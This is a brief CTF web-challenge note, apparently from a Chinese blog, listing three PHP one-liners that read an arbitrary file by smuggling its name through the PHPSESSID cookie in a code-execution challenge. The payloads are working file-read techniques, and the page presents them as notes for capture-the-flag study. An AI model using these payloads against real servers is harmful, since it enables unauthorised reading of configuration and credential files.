  • var_dump(file_get_contents(session_id(session_start())))

  • highlight_file(session_id(session_start()));

  • readfile(session_id(session_start()));
    抓包传入Cookie: PHPSESSID=(想读的文件)即可

  
 CTF WEB RCE


:D 一言句子获取中...